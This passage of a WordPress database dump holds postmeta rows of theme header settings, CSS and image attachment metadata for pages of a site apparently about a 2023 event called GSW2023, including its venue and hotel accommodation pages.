(10397,2675,'_dt_fancy_header_responsiveness_heading',''),
(10398,2675,'_dt_fancy_header_responsiveness','enabled'),
(10399,2675,'_dt_fancy_header_responsiveness_switch','778px'),
(10400,2675,'_dt_fancy_header_responsive_height','70'),
(10401,2675,'_dt_fancy_header_responsive_font_size','30'),
(10402,2675,'_dt_fancy_header_responsive_title_line_height','38'),
(10403,2675,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(10404,2675,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(10405,2675,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(10406,2675,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/slide92.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 350px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 50px;\n  line-height: 36px;\n  color: #3f3ff4;\n  text-transform: uppercase;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(10407,2675,'_wp_page_template','default'),
(10408,2675,'_dt_microsite_primary_menu',''),
(10409,2675,'_dt_microsite_split_left_menu',''),
(10410,2675,'_dt_microsite_split_right_menu',''),
(10411,2675,'_dt_microsite_mobile_menu',''),
(10412,2679,'_edit_lock','1675490858:1'),
(10421,2679,'_edit_last','1'),
(10422,2679,'_wpb_vc_js_status','true'),
(10423,2679,'_dt_sidebar_position','disabled'),
(10424,2679,'_dt_sidebar_widgetarea_id','sidebar_1'),
(10425,2679,'_dt_sidebar_hide_on_mobile','0'),
(10426,2679,'_dt_footer_show','1'),
(10427,2679,'_dt_footer_widgetarea_id','sidebar_2'),
(10428,2679,'_dt_footer_hide_on_mobile','0'),
(10429,2679,'_dt_header_title','fancy'),
(10430,2679,'_dt_header_background','normal'),
(10431,2679,'_dt_header_background_below_slideshow','disabled'),
(10432,2679,'_dt_header_transparent_bg_color_scheme','light'),
(10433,2679,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(10434,2679,'_dt_header_transparent_top_bar_bg_opacity','25'),
(10435,2679,'_dt_header_transparent_bg_color','#000000'),
(10436,2679,'_dt_header_transparent_bg_opacity','50'),
(10437,2679,'_dt_header_disabled_background','normal'),
(10438,2679,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(10439,2679,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(10440,2679,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(10441,2679,'_dt_header_disabled_transparent_bg_color','#000000'),
(10442,2679,'_dt_header_disabled_transparent_bg_opacity','50'),
(10443,2679,'_dt_page_overrides_top_margin',''),
(10444,2679,'_dt_page_overrides_right_margin',''),
(10445,2679,'_dt_page_overrides_bottom_margin',''),
(10446,2679,'_dt_page_overrides_left_margin',''),
(10447,2679,'_dt_mobile_page_padding_top',''),
(10448,2679,'_dt_mobile_page_padding_right',''),
(10449,2679,'_dt_mobile_page_padding_bottom',''),
(10450,2679,'_dt_mobile_page_padding_left',''),
(10451,2679,'_dt_fancy_header_layout_heading',''),
(10452,2679,'_dt_fancy_header_title_aligment','center'),
(10453,2679,'_dt_fancy_header_height','350'),
(10454,2679,'_dt_fancy_header_padding-top','0px'),
(10455,2679,'_dt_fancy_header_padding-bottom','0px'),
(10456,2679,'_dt_fancy_header_breadcrumbs_heading',''),
(10457,2679,'_dt_fancy_header_breadcrumbs','disabled'),
(10458,2679,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(10459,2679,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(10460,2679,'_dt_fancy_header_title_heading',''),
(10461,2679,'_dt_fancy_header_title_mode','custom'),
(10462,2679,'_dt_fancy_header_title','GSW2023 Venue'),
(10463,2679,'_dt_fancy_header_title_font_size','50'),
(10464,2679,'_dt_fancy_header_title_line_height','36'),
(10465,2679,'_dt_fancy_header_text_transform','uppercase'),
(10466,2679,'_dt_fancy_header_title_color_mode','color'),
(10467,2679,'_dt_fancy_header_title_color','#f2d30c'),
(10468,2679,'_dt_fancy_header_subtitle_heading',''),
(10469,2679,'_dt_fancy_header_subtitle',''),
(10470,2679,'_dt_fancy_header_subtitle_font_size','18'),
(10471,2679,'_dt_fancy_header_subtitle_line_height','26'),
(10472,2679,'_dt_fancy_header_subtitle_text_transform','uppercase'),
(10473,2679,'_dt_fancy_header_subtitle_color_mode','color'),
(10474,2679,'_dt_fancy_header_subtitle_color','#ffffff'),
(10475,2679,'_dt_fancy_header_bg_heading',''),
(10476,2679,'_dt_fancy_header_bg_color','#222222'),
(10477,2679,'_dt_fancy_header_bg_image_origin','featured_image'),
(10478,2679,'_dt_fancy_header_bg_image','a:0:{}'),
(10479,2679,'_dt_fancy_header_bg_repeat','no-repeat'),
(10480,2679,'_dt_fancy_header_bg_position_x','center'),
(10481,2679,'_dt_fancy_header_bg_position_y','center'),
(10482,2679,'_dt_fancy_header_bg_fullscreen','1'),
(10483,2679,'_dt_fancy_header_bg_overlay','0'),
(10484,2679,'_dt_fancy_header_overlay_color','#000'),
(10485,2679,'_dt_fancy_header_bg_overlay_opacity','50'),
(10486,2679,'_dt_fancy_header_scroll_effect','default'),
(10487,2679,'_dt_fancy_header_bg_parallax','0.5'),
(10488,2679,'_dt_fancy_header_responsiveness_heading',''),
(10489,2679,'_dt_fancy_header_responsiveness','enabled'),
(10490,2679,'_dt_fancy_header_responsiveness_switch','778px'),
(10491,2679,'_dt_fancy_header_responsive_height','70'),
(10492,2679,'_dt_fancy_header_responsive_font_size','30'),
(10493,2679,'_dt_fancy_header_responsive_title_line_height','38'),
(10494,2679,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(10495,2679,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(10496,2679,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(10497,2679,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 350px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 50px;\n  line-height: 36px;\n  color: #f2d30c;\n  text-transform: uppercase;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: uppercase;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(10498,2683,'_wp_attached_file','2022/10/is1.jpg'),
(10499,2683,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:850;s:6:\"height\";i:516;s:4:\"file\";s:15:\"2022/10/is1.jpg\";s:8:\"filesize\";i:479293;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"is1-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16894;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"is1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7120;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"is1-768x466.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:466;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87351;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(10500,53,'the7_shortcodes_dynamic_css','a:2:{i:0;s:0:\"\";s:32:\"94677f5b6233b9103e299675712c86a0\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-94677f5b6233b9103e299675712c86a0.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-94677f5b6233b9103e299675712c86a0.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-94677f5b6233b9103e299675712c86a0 .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-94677f5b6233b9103e299675712c86a0 .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";}'),
(10501,2679,'_wp_page_template','default'),
(10502,2679,'_dt_microsite_primary_menu',''),
(10503,2679,'_dt_microsite_split_left_menu',''),
(10504,2679,'_dt_microsite_split_right_menu',''),
(10505,2679,'_dt_microsite_mobile_menu',''),
(10506,2685,'_edit_lock','1692210375:1'),
(10515,2685,'_edit_last','1'),
(10516,2685,'_wpb_vc_js_status','false'),
(10517,2685,'_dt_sidebar_position','disabled'),
(10518,2685,'_dt_sidebar_widgetarea_id','sidebar_1'),
(10519,2685,'_dt_sidebar_hide_on_mobile','0'),
(10520,2685,'_dt_footer_show','1'),
(10521,2685,'_dt_footer_widgetarea_id','sidebar_2'),
(10522,2685,'_dt_footer_hide_on_mobile','0'),
(10523,2685,'_dt_header_title','fancy'),
(10524,2685,'_dt_header_background','normal'),
(10525,2685,'_dt_header_background_below_slideshow','disabled'),
(10526,2685,'_dt_header_transparent_bg_color_scheme','light'),
(10527,2685,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(10528,2685,'_dt_header_transparent_top_bar_bg_opacity','25'),
(10529,2685,'_dt_header_transparent_bg_color','#000000'),
(10530,2685,'_dt_header_transparent_bg_opacity','50'),
(10531,2685,'_dt_header_disabled_background','normal'),
(10532,2685,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(10533,2685,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(10534,2685,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(10535,2685,'_dt_header_disabled_transparent_bg_color','#000000'),
(10536,2685,'_dt_header_disabled_transparent_bg_opacity','50'),
(10537,2685,'_dt_page_overrides_top_margin',''),
(10538,2685,'_dt_page_overrides_right_margin',''),
(10539,2685,'_dt_page_overrides_bottom_margin',''),
(10540,2685,'_dt_page_overrides_left_margin',''),
(10541,2685,'_dt_mobile_page_padding_top',''),
(10542,2685,'_dt_mobile_page_padding_right',''),
(10543,2685,'_dt_mobile_page_padding_bottom',''),
(10544,2685,'_dt_mobile_page_padding_left',''),
(10545,2685,'_dt_fancy_header_layout_heading',''),
(10546,2685,'_dt_fancy_header_title_aligment','center'),
(10547,2685,'_dt_fancy_header_height','350'),
(10548,2685,'_dt_fancy_header_padding-top','0px'),
(10549,2685,'_dt_fancy_header_padding-bottom','0px'),
(10550,2685,'_dt_fancy_header_breadcrumbs_heading',''),
(10551,2685,'_dt_fancy_header_breadcrumbs','disabled'),
(10552,2685,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(10553,2685,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(10554,2685,'_dt_fancy_header_title_heading',''),
(10555,2685,'_dt_fancy_header_title_mode','custom'),
(10556,2685,'_dt_fancy_header_title','Hotel  Accommodation'),
(10557,2685,'_dt_fancy_header_title_font_size','50'),
(10558,2685,'_dt_fancy_header_title_line_height','36'),
(10559,2685,'_dt_fancy_header_text_transform','uppercase'),
(10560,2685,'_dt_fancy_header_title_color_mode','color'),
(10561,2685,'_dt_fancy_header_title_color','#ffffff'),
(10562,2685,'_dt_fancy_header_subtitle_heading',''),
(10563,2685,'_dt_fancy_header_subtitle',''),
(10564,2685,'_dt_fancy_header_subtitle_font_size','18'),
(10565,2685,'_dt_fancy_header_subtitle_line_height','26'),
(10566,2685,'_dt_fancy_header_subtitle_text_transform','none'),
(10567,2685,'_dt_fancy_header_subtitle_color_mode','color'),
(10568,2685,'_dt_fancy_header_subtitle_color','#ffffff'),
(10569,2685,'_dt_fancy_header_bg_heading',''),
(10570,2685,'_dt_fancy_header_bg_color','#222222'),
(10571,2685,'_dt_fancy_header_bg_image_origin','featured_image'),
(10572,2685,'_dt_fancy_header_bg_image','a:0:{}'),
(10573,2685,'_dt_fancy_header_bg_repeat','no-repeat'),
(10574,2685,'_dt_fancy_header_bg_position_x','center'),
(10575,2685,'_dt_fancy_header_bg_position_y','center'),
(10576,2685,'_dt_fancy_header_bg_fullscreen','1'),
(10577,2685,'_dt_fancy_header_bg_overlay','0'),
(10578,2685,'_dt_fancy_header_overlay_color','#000'),
(10579,2685,'_dt_fancy_header_bg_overlay_opacity','50'),
(10580,2685,'_dt_fancy_header_scroll_effect','default'),
(10581,2685,'_dt_fancy_header_bg_parallax','0.5'),
(10582,2685,'_dt_fancy_header_responsiveness_heading',''),
(10583,2685,'_dt_fancy_header_responsiveness','enabled'),
(10584,2685,'_dt_fancy_header_responsiveness_switch','778px'),
(10585,2685,'_dt_fancy_header_responsive_height','70'),
(10586,2685,'_dt_fancy_header_responsive_font_size','30'),
(10587,2685,'_dt_fancy_header_responsive_title_line_height','38'),
(10588,2685,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(10589,2685,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(10590,2685,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(10591,2685,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/282192719.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 350px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 50px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: uppercase;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(10592,2685,'_wp_page_template','default'),
(10593,2685,'_dt_microsite_primary_menu',''),
(10594,2685,'_dt_microsite_split_left_menu',''),
(10595,2685,'_dt_microsite_split_right_menu',''),
(10596,2685,'_dt_microsite_mobile_menu',''),
(10597,2688,'_wp_attached_file','2022/10/h11.jpg'),
(10598,2688,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:500;s:4:\"file\";s:15:\"2022/10/h11.jpg\";s:8:\"filesize\";i:285833;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"h11-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13578;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"h11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7021;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"h11-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58496;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(10599,2689,'_wp_attached_file','2022/10/h12.jpg'),
(10600,2689,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:500;s:4:\"file\";s:15:\"2022/10/h12.jpg\";s:8:\"filesize\";i:246417;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"h12-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12092;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"h12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5950;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"h12-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48879;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(10601,2690,'_wp_attached_file','2022/10/h13.jpg'),
(10602,2690,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:624;s:6:\"height\";i:468;s:4:\"file\";s:15:\"2022/10/h13.jpg\";s:8:\"filesize\";i:217168;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"h13-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14359;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"h13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6114;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(10604,2688,'dt-img-hide-title','0'),
(10605,2697,'_edit_lock','1675605047:1'),
(10606,2697,'_edit_last','1'),
(10607,2697,'_wpb_vc_js_status','true'),
(10608,2697,'_dt_sidebar_position','disabled'),
(10609,2697,'_dt_sidebar_widgetarea_id','sidebar_1'),
(10610,2697,'_dt_sidebar_hide_on_mobile','0'),
(10611,2697,'_dt_footer_show','1'),
(10612,2697,'_dt_footer_widgetarea_id','sidebar_2'),
(10613,2697,'_dt_footer_hide_on_mobile','0'),
(10614,2697,'_dt_header_title','fancy'),
(10615,2697,'_dt_header_background','normal'),
(10616,2697,'_dt_header_background_below_slideshow','disabled'),
(10617,2697,'_dt_header_transparent_bg_color_scheme','light'),
(10618,2697,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(10619,2697,'_dt_header_transparent_top_bar_bg_opacity','25'),
(10620,2697,'_dt_header_transparent_bg_color','#000000'),
(10621,2697,'_dt_header_transparent_bg_opacity','50'),
(10622,2697,'_dt_header_disabled_background','normal'),
(10623,2697,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(10624,2697,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(10625,2697,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(10626,2697,'_dt_header_disabled_transparent_bg_color','#000000'),
(10627,2697,'_dt_header_disabled_transparent_bg_opacity','50'),
(10628,2697,'_dt_page_overrides_top_margin',''),
(10629,2697,'_dt_page_overrides_right_margin',''),
(10630,2697,'_dt_page_overrides_bottom_margin',''),
(10631,2697,'_dt_page_overrides_left_margin',''),
(10632,2697,'_dt_mobile_page_padding_top',''),
(10633,2697,'_dt_mobile_page_padding_right',''),
(10634,2697,'_dt_mobile_page_padding_bottom',''),
(10635,2697,'_dt_mobile_page_padding_left',''),
(10636,2697,'_dt_fancy_header_layout_heading',''),
(10637,2697,'_dt_fancy_header_title_aligment','center'),
(10638,2697,'_dt_fancy_header_height','300'),
(10639,2697,'_dt_fancy_header_padding-top','0px'),
(10640,2697,'_dt_fancy_header_padding-bottom','0px'),
(10641,2697,'_dt_fancy_header_breadcrumbs_heading',''),
(10642,2697,'_dt_fancy_header_breadcrumbs','disabled'),
(10643,2697,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(10644,2697,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(10645,2697,'_dt_fancy_header_title_heading',''),
(10646,2697,'_dt_fancy_header_title_mode','custom'),
(10647,2697,'_dt_fancy_header_title',''),
(10648,2697,'_dt_fancy_header_title_font_size','30'),
(10649,2697,'_dt_fancy_header_title_line_height','36'),
(10650,2697,'_dt_fancy_header_text_transform','none'),
(10651,2697,'_dt_fancy_header_title_color_mode','color'),
(10652,2697,'_dt_fancy_header_title_color','#ffffff'),
(10653,2697,'_dt_fancy_header_subtitle_heading',''),
(10654,2697,'_dt_fancy_header_subtitle',''),
(10655,2697,'_dt_fancy_header_subtitle_font_size','18'),
(10656,2697,'_dt_fancy_header_subtitle_line_height','26'),
(10657,2697,'_dt_fancy_header_subtitle_text_transform','none'),
(10658,2697,'_dt_fancy_header_subtitle_color_mode','color'),
(10659,2697,'_dt_fancy_header_subtitle_color','#ffffff'),
(10660,2697,'_dt_fancy_header_bg_heading',''),
(10661,2697,'_dt_fancy_header_bg_color','#222222'),
(10662,2697,'_dt_fancy_header_bg_image_origin','featured_image'),
(10663,2697,'_dt_fancy_header_bg_image','a:0:{}'),
(10664,2697,'_dt_fancy_header_bg_repeat','no-repeat'),
(10665,2697,'_dt_fancy_header_bg_position_x','center'),
(10666,2697,'_dt_fancy_header_bg_position_y','center'),
(10667,2697,'_dt_fancy_header_bg_fullscreen','1'),
(10668,2697,'_dt_fancy_header_bg_overlay','0'),
(10669,2697,'_dt_fancy_header_overlay_color','#000'),
(10670,2697,'_dt_fancy_header_bg_overlay_opacity','50'),
(10671,2697,'_dt_fancy_header_scroll_effect','default'),
(10672,2697,'_dt_fancy_header_bg_parallax','0.5'),
(10673,2697,'_dt_fancy_header_responsiveness_heading',''),
(10674,2697,'_dt_fancy_header_responsiveness','enabled'),
(10675,2697,'_dt_fancy_header_responsiveness_switch','778px'),
(10676,2697,'_dt_fancy_header_responsive_height','70'),
(10677,2697,'_dt_fancy_header_responsive_font_size','30'),
(10678,2697,'_dt_fancy_header_responsive_title_line_height','38'),
(10679,2697,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(10680,2697,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(10681,2697,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(10682,2697,'_dt_project_options_back_button',''),
(10683,2697,'_dt_project_options_show_link',''),
(10684,2697,'_dt_project_options_link',''),
(10685,2697,'_dt_project_options_link_target',''),
(10686,2697,'_dt_project_options_link_name',''),
(10687,2697,'_dt_project_options_hide_thumbnail','1'),
(10688,2697,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(10689,2697,'_dt_project_options_related_mode','same'),
(10690,2697,'_dt_project_options_preview','normal'),
(10691,2697,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/ws9-e1665288401237.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 